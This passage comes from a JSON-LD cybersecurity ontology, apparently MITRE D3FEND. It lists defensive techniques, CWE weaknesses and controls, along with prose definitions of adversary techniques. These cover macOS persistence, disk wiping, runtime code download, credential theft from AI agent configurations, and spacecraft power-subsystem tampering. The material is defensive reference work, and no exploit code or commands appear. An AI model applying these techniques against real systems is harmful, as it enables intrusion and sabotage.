      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-AC",
      "d3f:definition": "Agglomerative Clustering is a type of hierarchical clustering method where data points are grouped together based on similarity. Initially, each data point is treated as an individual cluster, and then in successive iterations, the closest clusters are merged until only one large cluster remains or until a specified stopping criterion is met.",
      "d3f:kb-article": "## How it works\n\nAgglomerative clustering starts with each data point as its own cluster. The algorithm then iterates, identifying the two clusters that are closest to each other based on a defined distance metric (e.g., Euclidean, Manhattan). These two clusters are then merged into a single cluster. This process continues iteratively, merging the closest pairs of clusters in each step until all data points are merged into a single cluster or until other stopping criteria are achieved. A dendrogram, which is a tree-like diagram, can be used to represent the sequence of merges, providing a visual representation of the hierarchical structure of data.\n\n## Considerations\n\n- **Choice of Distance Metric**: The outcome can vary significantly depending on the chosen distance metric (e.g., Euclidean, Manhattan).\n\n- **Scalability**: Agglomerative clustering can be computationally intensive for large datasets.\n\n- **Sensitivity**: The method can be sensitive to outliers, which might affect the quality of the clusters formed.\n\n## Key Test Considerations\n\n- **Unsupervised Learning**:\n\n  - **Number of Clusters**: Determine an optimal number of clusters using the dendrogram and techniques like the elbow method.\n\n- **Cluster Analysis**:\n\n    - **Silhouette Score**: Evaluates how similar an object is to its own cluster compared to other clusters. A higher silhouette score indicates that the object is well matched to its own cluster and poorly matched to neighboring clusters.\n\n    - **Dunn Index**: Measures the ratio between the smallest distance between observations not in the same cluster to the largest intra-cluster distance.\n\n- **Hierarchical Clustering**:\n\n    - **Cophenetic Correlation Coefficient**: Measures the correlation between the distances of points in feature space and their distances on the dendrogram. Helps assess the fidelity of the dendrogram in preserving pairwise distances between samples.\n\n- **Agglomerative Clustering**:\n\n    - **Linkage Criteria**: Test different linkage criteria (e.g., single, complete, average) to determine which produces the most cohesive clusters for the data at hand.\n\n  ## Platforms, Tools, or Libraries\n\n- **scikit-learn**:\n\n    - A versatile machine learning library in Python.\n\n    - The `AgglomerativeClustering` class in scikit-learn provides this functionality.\n\n- **SciPy**:\n\n    - A Python library used for scientific and technical computing.\n\n    - The `scipy.cluster.hierarchy` module provides functions for hierarchical and\n    agglomerative clustering, including the `linkage` and `dendrogram` functions.\n\n- **R**:\n\n    - The `hclust` function in the stats package provides agglomerative clustering.\n\n    - The `agnes` function in the `cluster` package offers a more extensive implementation.\n\n- **MATLAB**:\n\n    - Offers the `linkage` function for hierarchical agglomerative clustering and `dendrogram` for visualization.\n\n- **Weka**:\n\n    - A collection of machine learning algorithms for data mining tasks.\n\n    - The `HierarchicalClusterer` class provides an implementation of agglomerative clustering.\n\n## References\n\n1. Jain, A. K., & Dubes, R. C. (1988). *Algorithms for clustering data*. Prentice-Hall, Inc.\n\n2. Murtagh, F., & Legendre, P. (2014). Ward’s hierarchical agglomerative clustering method: which algorithms implement Ward’s criterion?. *Journal of Classification*, 31(3), 274-295. [Link](https://link.springer.com/article/10.1007/s00357-014-9161-z).\n\n3. Scikit-learn. (30 Jun 2023). Scikit-learn Documentation: Agglomerative Clustering.\n[Link](https://scikit-learn.org/stable/modules/generated/sklearn.cluster.AgglomerativeClustering.html).",
      "rdfs:label": "Agglomerative Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:HierarchicalClustering"
      }
    },
    {
      "@id": "d3f:CWE-487",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-487",
      "d3f:definition": "Java packages are not inherently closed; therefore, relying on them for code security is not a good practice.",
      "rdfs:label": "Reliance on Package-level Scope",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:CCI-001356_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization monitors for atypical usage of information system accounts.",
      "d3f:exactly": [
        {
          "@id": "d3f:AuthenticationEventThresholding"
        },
        {
          "@id": "d3f:AuthorizationEventThresholding"
        }
      ],
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001356"
    },
    {
      "@id": "d3f:CWE-1055",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1055",
      "d3f:definition": "The product contains a class with inheritance from more than one concrete class.",
      "rdfs:label": "Multiple Inheritance from Concrete Classes",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1093"
      }
    },
    {
      "@id": "d3f:OTDownloadControlProgramCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which a remote device is commanded to download a control program.",
      "rdfs:label": "OT Download Control Program Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyControlProgramCommandEvent"
        },
        {
          "@id": "_:Ne22926ae286d4aaa8ea8128bc2a52591"
        },
        {
          "@id": "_:Nfa729ca93b5a45239e944fc6f0919ee6"
        }
      ]
    },
    {
      "@id": "_:Ne22926ae286d4aaa8ea8128bc2a52591",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "_:Nfa729ca93b5a45239e944fc6f0919ee6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDownloadControlProgramCommand"
      }
    },
    {
      "@id": "d3f:LinuxSocketcallArgumentSYS_SOCKET",
      "@type": "owl:Class",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/socketcall.2.html"
      },
      "rdfs:label": "Linux Socketcall Argument SYS_SOCKET",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateSocket"
      }
    },
    {
      "@id": "d3f:DefensiveTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DefensiveTechnique"
      ],
      "d3f:definition": "A method which makes a computer system more difficult to attack.",
      "d3f:display-baseurl": "/technique/",
      "d3f:synonym": [
        "Countermeasure Technique",
        "Defensive Capability Feature",
        "Technical Security Control"
      ],
      "rdfs:label": "Defensive Technique",
      "rdfs:seeAlso": {
        "@id": "https://csrc.nist.gov/glossary/term/security_control"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CyberTechnique"
        },
        {
          "@id": "_:N86febf888f66478f95622a187c8f9a7e"
        },
        {
          "@id": "_:N7975ce0518934a10bfd65189fd7ca184"
        },
        {
          "@id": "_:Nd15f0515ca254a5688fb4c5fca438452"
        },
        {
          "@id": "_:N489b8c964da14304bdac85419abaf2ad"
        }
      ]
    },
    {
      "@id": "_:N86febf888f66478f95622a187c8f9a7e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DefensiveTactic"
      }
    },
    {
      "@id": "_:N7975ce0518934a10bfd65189fd7ca184",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:kb-reference"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TechniqueReference"
      }
    },
    {
      "@id": "_:Nd15f0515ca254a5688fb4c5fca438452",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:d3fend-id"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:string"
      }
    },
    {
      "@id": "_:N489b8c964da14304bdac85419abaf2ad",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:date"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:dateTime"
      }
    },
    {
      "@id": "d3f:T0839",
      "@type": "owl:Class",
      "d3f:attack-id": "T0839",
      "d3f:definition": "Adversaries may install malicious or vulnerable firmware onto modular hardware devices. Control system devices often contain modular hardware devices. These devices may have their own set of firmware that is separate from the firmware of the main control system equipment.",
      "rdfs:label": "Module Firmware - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSImpairProcessControlTechnique"
        },
        {
          "@id": "d3f:ATTACKICSPersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Module Firmware"
    },
    {
      "@id": "d3f:CommandHistoryLog",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A log of commands run in an operating system shell.",
      "rdfs:label": "Command History Log",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:CommandLineInterface"
        },
        {
          "@id": "dbr:Command_history"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "d3f:T1086",
      "@type": "owl:Class",
      "d3f:attack-id": "T1086",
      "d3f:definition": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1059.001",
      "rdfs:label": "PowerShell",
      "rdfs:seeAlso": {
        "@id": "d3f:T1059.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:CCIControl",
      "@type": "owl:Class",
      "rdfs:label": "CCI Control",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExternalControl"
        },
        {
          "@id": "_:N6dd1161e9db344e5af89f7b81c1555cf"
        },
        {
          "@id": "_:N7a95d9ce5e024dae98cb03c762b4cd9b"
        },
        {
          "@id": "_:Nb812dc3ea55a4a8980e79e433b7fcb07"
        }
      ]
    },
    {
      "@id": "_:N6dd1161e9db344e5af89f7b81c1555cf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:member-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ControlCorrelationIdentifierCatalog"
      }
    },
    {
      "@id": "_:N7a95d9ce5e024dae98cb03c762b4cd9b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:control-name"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:string"
      }
    },
    {
      "@id": "_:Nb812dc3ea55a4a8980e79e433b7fcb07",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:published"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:dateTime"
      }
    },
    {
      "@id": "d3f:AccessToken",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computer systems, an access token contains the security credentials for a login session and identifies the user, the user's groups, the user's privileges, and, in some cases, a particular application. Typically one may be asked to enter the access token (e.g. 40 random characters) rather than the usual password (it therefore should be kept secret just like a password).",
      "rdfs:label": "Access Token",
      "rdfs:seeAlso": {
        "@id": "dbr:Access_token"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Credential"
      },
      "skos:altLabel": [
        "Ticket",
        "Token"
      ]
    },
    {
      "@id": "d3f:T1625.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1625.001",
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking the way an operating system runs applications. Hijacking execution flow can be for the purposes of persistence since this hijacked execution may reoccur at later points in time.",
      "rdfs:label": "System Runtime API Hijacking - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1625"
      },
      "skos:prefLabel": "System Runtime API Hijacking"
    },
    {
      "@id": "d3f:SingularValueDecomposition",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SVD",
      "d3f:definition": "Singular Value Decomposition (SVD) is an algorithm that represents a matrix as a linear series of data and to find the set of factors that will best predict an outcome",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Singular value decomposition. [Link](https://en.wikipedia.org/wiki/Singular_value_decomposition)",
      "rdfs:label": "Singular Value Decomposition",
      "rdfs:subClassOf": {
        "@id": "d3f:DimensionReduction"
      }
    },
    {
      "@id": "d3f:EX-0010",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0010",
      "d3f:definition": "The adversary achieves on-board effects by introducing executable logic that runs on the vehicle, either native binaries and scripts, injected shellcode, or “data payloads” that an interpreter treats as code (e.g., procedure languages, table-driven automations). Delivery commonly piggybacks on legitimate pathways: software/firmware updates, file transfer services, table loaders, maintenance consoles, or command sequences that write to executable regions. Once staged, activation can be explicit (a specific command, mode change, or file open), environmental (time/geometry triggers), or accidental, where operator actions or routine autonomy invoke the implanted logic. Malicious code can target any layer it can reach: altering flight software behavior, manipulating payload controllers, patching boot or device firmware, or installing hooks in drivers and gateways that bridge bus and payload traffic. Effects range from subtle logic changes (quiet data tampering, command filtering) to overt actions (forced mode transitions, resource starvation), and may include secondary capabilities like covert communications, key material harvesting, or persistence across resets by rewriting images or configuration entries.",
      "rdfs:label": "Malicious Code - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0010/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Malicious Code"
    },
    {
      "@id": "d3f:Reference-SupplyChainCyber-deception_Cymmetria,Inc.",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/WO2017187379A1"
      },
      "d3f:kb-abstract": "A computer implemented method of detecting unauthorized access to a protected network from external endpoints, comprising monitoring, at a protected network, communication with one or more external endpoints using one or more access clients to access one or more of a plurality of resources of the protected networked, where one or more deception resources created in the protected network map one or more of the plurality of resources, detecting usage of data contained in one or more of a plurality of deception data objects deployed in the one or more access clients by monitoring an interaction triggered by one or more of the deception data objects with the one or more deception resources when used and identifying one or more potential unauthorized operations based on analysis of the detection.",
      "d3f:kb-author": "Gadi EVRON; Dean SYSMAN; Imri Goldberg; Shmuel Ur",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Cymmetria, Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyFile"
      },
      "d3f:kb-reference-title": "Supply chain cyber-deception",
      "rdfs:label": "Reference - Supply chain cyber-deception - Cymmetria, Inc."
    },
    {
      "@id": "d3f:excises",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x excises y: Technique x removes a section of entity y.",
      "rdfs:label": "excises",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:T1546.014",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.014",
      "d3f:definition": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at <code>/sbin/emond</code> will load any rules from the <code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined event takes place.",
      "d3f:may-create": {
        "@id": "d3f:PropertyListFile"
      },
      "d3f:may-modify": {
        "@id": "d3f:PropertyListFile"
      },
      "d3f:modifies": {
        "@id": "d3f:ConfigurationResource"
      },
      "rdfs:label": "Emond",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:N96726ac871574644956937af64c16ec5"
        },
        {
          "@id": "_:Nb824dfba7fef4063b8fdc59074bdc64a"
        },
        {
          "@id": "_:Nf18f13b777d440d5a98cc0a4369e9faf"
        }
      ]
    },
    {
      "@id": "_:N96726ac871574644956937af64c16ec5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PropertyListFile"
      }
    },
    {
      "@id": "_:Nb824dfba7fef4063b8fdc59074bdc64a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PropertyListFile"
      }
    },
    {
      "@id": "_:Nf18f13b777d440d5a98cc0a4369e9faf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ConfigurationResource"
      }
    },
    {
      "@id": "d3f:CWE-444",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-444",
      "d3f:definition": "The product acts as an intermediary HTTP agent (such as a proxy or firewall) in the data flow between two entities such as a client and server, but it does not interpret malformed HTTP requests or responses in ways that are consistent with how the messages will be processed by those entities that are at the ultimate destination.",
      "d3f:synonym": [
        "HTTP Request Smuggling",
        "HTTP Response Smuggling",
        "HTTP Smuggling"
      ],
      "rdfs:label": "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-436"
      }
    },
    {
      "@id": "d3f:T1561.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1561.002",
      "d3f:definition": "Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.",
      "d3f:may-modify": [
        {
          "@id": "d3f:BootSector"
        },
        {
          "@id": "d3f:PartitionTable"
        }
      ],
      "rdfs:label": "Disk Structure Wipe",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1561"
        },
        {
          "@id": "_:N5054c7573d204e788e1d9dc4f14cbf6b"
        },
        {
          "@id": "_:Nc154604557074f9195fe8b0fe06d4fdf"
        }
      ]
    },
    {
      "@id": "_:N5054c7573d204e788e1d9dc4f14cbf6b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootSector"
      }
    },
    {
      "@id": "_:Nc154604557074f9195fe8b0fe06d4fdf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PartitionTable"
      }
    },
    {
      "@id": "d3f:ComputingServer",
      "@type": "owl:Class",
      "d3f:definition": "A compute server is a system specifically designed to undertake large amounts of computation, usually but not necessarily in a client/server environment.",
      "rdfs:isDefinedBy": {
        "@id": "https://www.encyclopedia.com/computing/dictionaries-thesauruses-pictures-and-press-releases/compute-server"
      },
      "rdfs:label": "Computing Server",
      "rdfs:subClassOf": {
        "@id": "d3f:Server"
      }
    },
    {
      "@id": "d3f:OrganizationMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OrganizationMapping"
      ],
      "d3f:d3fend-id": "D3-OM",
      "d3f:definition": "Organization mapping identifies and models the people, roles, and groups with an organization and the relations between them.",
      "d3f:display-order": 4,
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CatiaUAFPlugin"
        },
        {
          "@id": "d3f:Reference-OrganizationalManagementInSAPERPHCM"
        },
        {
          "@id": "d3f:Reference-UnifiedArchitectureFrameworkUAF"
        }
      ],
      "d3f:maps": [
        {
          "@id": "d3f:Dependency"
        },
        {
          "@id": "d3f:Organization"
        },
        {
          "@id": "d3f:Person"
        }
      ],
      "d3f:may-map": {
        "@id": "d3f:OperationalActivityPlan"
      },
      "rdfs:label": "Organization Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperationalActivityMapping"
        },
        {
          "@id": "_:N94628d33a65940389dfa03f43ae21b4a"
        },
        {
          "@id": "_:N5ee9028255f04e098fec04241674fb61"
        },
        {
          "@id": "_:Nfa6defcc3ead415388a4fedaa55e555c"
        },
        {
          "@id": "_:N956c937f24d94efbac096cbede9aa7c5"
        }
      ]
    },
    {
      "@id": "_:N94628d33a65940389dfa03f43ae21b4a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Dependency"
      }
    },
    {
      "@id": "_:N5ee9028255f04e098fec04241674fb61",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Organization"
      }
    },
    {
      "@id": "_:Nfa6defcc3ead415388a4fedaa55e555c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Person"
      }
    },
    {
      "@id": "_:N956c937f24d94efbac096cbede9aa7c5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-map"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperationalActivityPlan"
      }
    },
    {
      "@id": "d3f:CWE-1067",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1067",
      "d3f:definition": "The product contains a data query against an SQL table or view that is configured in a way that does not utilize an index and may cause sequential searches to be performed.",
      "rdfs:label": "Excessive Execution of Sequential Searches of Data Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1176"
      }
    },
    {
      "@id": "d3f:LogicalLinkMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:LogicalLinkMapping"
      ],
      "d3f:d3fend-id": "D3-LLM",
      "d3f:definition": "Logical link mapping creates a model of existing or previous node-to-node connections using network-layer data or metadata.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-LibreNMSDocsNetworkMapExtension"
      },
      "d3f:maps": [
        {
          "@id": "d3f:LogicalLink"
        },
        {
          "@id": "d3f:Network"
        },
        {
          "@id": "d3f:NetworkNode"
        }
      ],
      "rdfs:label": "Logical Link Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkMapping"
        },
        {
          "@id": "_:N79555bac6f6d4a159109da7b205b2b47"
        },
        {
          "@id": "_:N536a37ee5ecd4aa69750b6df6bd36894"
        },
        {
          "@id": "_:Nc1105f610f844d278470e96aed54cc5d"
        }
      ]
    },
    {
      "@id": "_:N79555bac6f6d4a159109da7b205b2b47",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LogicalLink"
      }
    },
    {
      "@id": "_:N536a37ee5ecd4aa69750b6df6bd36894",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Network"
      }
    },
    {
      "@id": "_:Nc1105f610f844d278470e96aed54cc5d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkNode"
      }
    },
    {
      "@id": "d3f:T1543.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1543.001",
      "d3f:creates": {
        "@id": "d3f:PropertyListFile"
      },
      "d3f:definition": "Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>~/Library/LaunchAgents</code>.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the <code>Label</code>, <code>ProgramArguments </code>, and <code>RunAtLoad</code> keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.",
      "rdfs:label": "Launch Agent",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1543"
        },
        {
          "@id": "_:N244ca21c3d9444259b32f2b4b7cd536a"
        }
      ]
    },
    {
      "@id": "_:N244ca21c3d9444259b32f2b4b7cd536a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PropertyListFile"
      }
    },
    {
      "@id": "d3f:d3fend-display-property",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x d3fend-display-property y: An object x should be displayed using the display property y, when it applies.",
      "rdfs:label": "d3fend-display-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-data-property"
      }
    },
    {
      "@id": "d3f:CWE-280",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-280",
      "d3f:definition": "The product does not handle or incorrectly handles when it has insufficient privileges to access resources or functionality as specified by their permissions. This may cause it to follow unexpected code paths that may leave the product in an invalid state.",
      "rdfs:label": "Improper Handling of Insufficient Permissions or Privileges",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-755"
      }
    },
    {
      "@id": "d3f:AML.T0083",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0083",
      "d3f:definition": "Adversaries may access the credentials of other tools or services on a system from the configuration of an AI agent.\n\nAI Agents often utilize external tools or services to take actions, such as querying databases, invoking APIs, or interacting with cloud resources. To enable these functions, credentials like API keys, tokens, and connection strings are frequently stored in configuration files. While there are secure methods such as dedicated secret managers or encrypted vaults that can be deployed to store and manage these credentials, in practice they are often placed in less protected locations for convenience or ease of deployment. If an attacker can read or extract these configurations, they may obtain valid credentials that allow direct access to sensitive systems outside the agent itself.",
      "rdfs:label": "Credentials from AI Agent Configuration - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0083"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASCredentialAccessTechnique"
      },
      "skos:prefLabel": "Credentials from AI Agent Configuration"
    },
    {
      "@id": "d3f:T1407",
      "@type": "owl:Class",
      "d3f:attack-id": "T1407",
      "d3f:definition": "Adversaries may download and execute dynamic code not included in the original application package after installation. This technique is primarily used to evade static analysis checks and pre-publication scans in official app stores. In some cases, more advanced dynamic or behavioral analysis techniques could detect this behavior. However, in conjunction with [Execution Guardrails](https://attack.mitre.org/techniques/T1627) techniques, detecting malicious code downloaded after installation could be difficult.",
      "rdfs:label": "Download New Code at Runtime - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Download New Code at Runtime"
    },
    {
      "@id": "d3f:kb-reference-of",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x kb-is-example-of y: The reference x is an example of technique y.",
      "rdfs:label": "kb-reference-of",
      "rdfs:range": {
        "@id": "d3f:CyberTechnique"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-object-property"
      },
      "skos:altLabel": "kb-is-example-of"
    },
    {
      "@id": "d3f:T1094",
      "@type": "owl:Class",
      "d3f:attack-id": "T1094",
      "d3f:definition": "Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing [Application Layer Protocol](https://attack.mitre.org/techniques/T1071). Implementations include mimicking well-known protocols or developing custom protocols (including raw sockets) on top of fundamental protocols provided by TCP/IP/another standard network stack.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1095",
      "rdfs:label": "Custom Command and Control Protocol",
      "rdfs:seeAlso": {
        "@id": "d3f:T1095"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:CWE-838",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-838",
      "d3f:definition": "The product uses or specifies an encoding when generating output to a downstream component, but the specified encoding is not the same as the encoding that is expected by the downstream component.",
      "rdfs:label": "Inappropriate Encoding for Output Context",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-116"
      }
    },
    {
      "@id": "d3f:AML.T0048",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0048",
      "d3f:definition": "Adversaries may abuse their access to a victim system and use its resources or capabilities to further their goals by causing harms external to that system.\nThese harms could affect the organization (e.g. Financial Harm, Reputational Harm), its users (e.g. User Harm), or the general public (e.g. Societal Harm).",
      "rdfs:label": "External Harms - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0048"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASImpactTechnique"
      },
      "skos:prefLabel": "External Harms"
    },
    {
      "@id": "d3f:EX-0012.09",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.09",
      "d3f:definition": "Adversaries alter parameters and sensed values that govern power generation, storage, and distribution so the spacecraft draws or allocates energy in harmful ways. Editable items include bus voltage/current limits, MPPT setpoints and sweep behavior, array and SADA modes, battery charge/discharge thresholds and temperature derates, state-of-charge estimation constants, latching current limiter (LCL) trip/retry settings, load-shed priorities, heater duty limits, and survival/keep-alive rules. By changing these, a threat actor can drive excess consumption (e.g., disabling load shed, raising heater floors), misreport remaining energy (skewed SoC), or push batteries outside healthy ranges, producing brownouts, repeated safing, or premature capacity loss. Manipulating thresholds and hysteresis can also create oscillations where loads repeatedly drop and re-engage, wasting energy and stressing components. The effect is accelerated depletion or misallocation of finite power, degrading mission operations and potentially preventing recovery after eclipse or anomalies.",
      "rdfs:label": "Electrical Power Subsystem - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/09/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "Electrical Power Subsystem"
    },
    {
      "@id": "d3f:PhysicalAddress",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In a computer supporting virtual memory, the term physical address is used mostly to differentiate from a virtual address. In particular, in computers utilizing a memory management unit(MMU) to translate memory addresses, the virtual and physical addresses refer to an address before and after translation performed by the MMU, respectively.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Physical_address"
      },
      "rdfs:label": "Physical Address",
      "rdfs:subClassOf": {
        "@id": "d3f:MemoryAddress"
      }
    },
    {
      "@id": "d3f:T0885",
      "@type": "owl:Class",
